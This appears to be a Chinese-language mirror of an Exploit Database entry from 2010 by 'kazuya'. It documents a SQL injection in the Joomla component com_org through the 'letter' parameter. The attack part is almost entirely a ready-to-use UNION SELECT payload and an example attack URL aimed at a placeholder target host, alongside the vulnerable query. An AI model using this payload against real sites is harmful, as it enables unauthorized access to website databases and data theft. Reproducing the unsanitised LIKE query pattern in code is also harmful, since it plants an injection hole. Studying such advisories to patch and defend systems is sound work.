Joomla! Component com_org – ‘letter’ SQL Injection

• Exploit Database
• 121 阅读

• 作者： kazuya
  日期： 2010-03-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11752/
• 1 2 3 4 5 6 7 8 9 10

  # Joomla com_org SQL Injection Vulnerability (letter parameter) # Author: kazuya # Mail: kazuy0r@gmail.com<mailto:kazuy0r@gmail.com> Jabber: kazuya@jabber.ccc.de<mailto:kazuya@jabber.ccc.de> # Greetz to back2hack   # Vulnerability # Query: SELECT count(*) FROM <code>jos_org</code> WHERE (<code>name</code> LIKE &apos;<sql>%&apos; || ... # SQL: &apos;)+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f # Example: http://[target].com/index.php?option=com_org&letter=&apos;)+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs